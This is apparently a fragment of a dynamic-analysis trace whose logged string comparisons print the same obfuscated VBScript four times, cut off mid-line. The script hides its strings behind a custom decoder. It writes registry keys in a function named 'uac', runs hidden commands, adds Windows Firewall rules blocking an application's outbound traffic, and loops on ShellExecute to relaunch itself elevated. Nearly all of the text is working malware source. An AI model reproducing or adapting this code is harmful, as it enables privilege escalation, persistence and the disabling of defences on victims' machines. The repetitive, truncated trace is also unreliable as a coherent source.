bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.938] wcsncmp (_String1="x = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.938] wcsncmp (_String1=" = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.939] wcsncmp (_String1="= 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.939] wcsncmp (_String1=" 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 